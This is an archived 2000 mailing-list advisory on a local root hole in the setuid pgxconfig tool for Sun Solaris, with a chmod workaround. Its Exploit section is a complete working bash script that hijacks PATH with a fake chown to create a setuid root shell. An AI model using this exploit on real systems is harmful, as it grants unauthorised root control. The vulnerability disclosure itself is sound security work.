OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Local root compromise in PGX Config Sun Sparc Solaris
From: suidSUID.KG
Date: Wed Aug 02 2000 - 11:04:07 CDT


hi guys and gals

yeah heres something i have had sitting on the shelf until the vendor sent me a
fix. they seem to have done that so here it is. drum roll...

--- Start ---

suidsuid.kg - Raptor GFX config tool local root vulnerability

Short Name: PGXCONFIG-SPARC
Software: Raptor GFXtra configuration tool - pgxconfig
URL: http://www.techsource.com
                ftp://www.techsource.com/download/gfxtra.OWv101.tar.Z
Version: PGX32 (Raptor GFX) X Window System Support v2.3.1
Platforms:
                Sun Solaris:
                        2.5.1 Sparc
                        2.6 Sparc
                        7 Sparc
                        8 Sparc

Type: Multiple. Lack of environment sanity checks. Insufficient
                bounds checking. Insecure use of the /tmp dir.
Date: 04 July 2000

Summary:

        Local users can run arbitrary commands as root.

Background:

        Raptor GFX cards are PCI accelerated graphics adapters suitable
        for use in Sun Sparc systems (among others). The associated driver
        and configuration software is distributed for the Sun platform from
        the techsource.com website.

Vulnerability:

        The configuration tool associated with this product is called
        pgxconfig and is installed in /usr/sbin mode 4555 by default.

        Extract from pkgmap:
                1 d none sbin 0775 root bin
                1 s none sbin/GFXconfig=pgxconfig
                1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098

        With this command it is possible for any user on the system to
        change the openwin configuration. The way this program does
        this is using system("cp"); to copy the existing configuration
        to a backup before overwriting the configuration with
        a new file. Anyway, we all know that Solaris's implementation of
        system() does NOT execute processes with root priviledges when the users
        uid >= 100. However, this particular version of
        pgxconfig does a nice setuid(0); for us. So, while we had euid = 0 from
        being executed as a suid root program, we now have uid = 0 and thus
        system() will execute whatever its told to, as root.

        In this particular program, system is used badly and two things are
        going on.
                
                1. root privileges are not dropped
                2. the environment is not sanitised

        without source I cant show you exactly whats going on in there but the
        result is obviously insecure.

        Its worth noting here (and demonstrating in the exploit) that the
        use of system("cp /whatever /wherever"); isn't the only system()
        call worth exploiting. I've used the easiest one in my exploit
        below.

        Other problems noted but not investigated were multiple command
        line options lacking proper bounds checking and predictable temp
        file creation. It would be a good idea for the vendor to
        perform a complete audit on this product.

Exploit:
        ---------------------------CUT---------------------------
        #!/usr/local/bin/bash

        # TechSource Raptor GFX configurator root exploit
        # suidsuid.kg

        # unfortunately a compiler must be installed to use this example
        # exploit. however there's a million ways around this you know
        
        # on my system , gcc isnt in my path
        PATH=$PATH:/usr/local/bin

        # build a little prog nothing new here folks
        echo '#include<stdio.h>' > ./x.c
        echo 'int main(void) { setuid(0); setgid(0); execl
("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
        gcc x.c -o foobar
        rm -f ./x.c

        # build a substitute chown command. i much prefer this over
        # regular chown
        echo "#!/bin/sh" > chown
        echo "/usr/bin/chown root ./foobar" >> chown
        echo "/usr/bin/chmod 4755 ./foobar" >> chown
        chmod 0755 chown

        # oooh look its the magical fairy path variable
        export PATH=.:$PATH
        
        # heres one way to skin a cat
        # (theres more, some need valid devices. excercise for the readers)
        /usr/sbin/pgxconfig -i
        rm -f chown

        ./foobar

        ----------------------------END--------------------------

Fix:

        No source, no fix. A workaround is:

        Disable /usr/sbin/pgxconfig or /usr/sbin/GFXconfig (or both)
        or at least remove the suid bit.

        # chmod 0 /usr/sbin/pgxconfig

        or

        # chmod 0511 /usr/sbin/pgxconfig

        Until your vendor can issue a fix.

Greets:

        duke - r0x j00r s0x
        cr - m3mb3r 0f t4sk f0rc3 el1t3-p0rn-k1ngz
        yowie - elite greet wh0re
        ratcorpse + par - congrats dudes
        anyone i met at defcon 8 / black hat briefings
        
Thumbs Down:

        Network Solutions - assholes

http://www.suid.edu/advisories/012.txt

--- EOF ---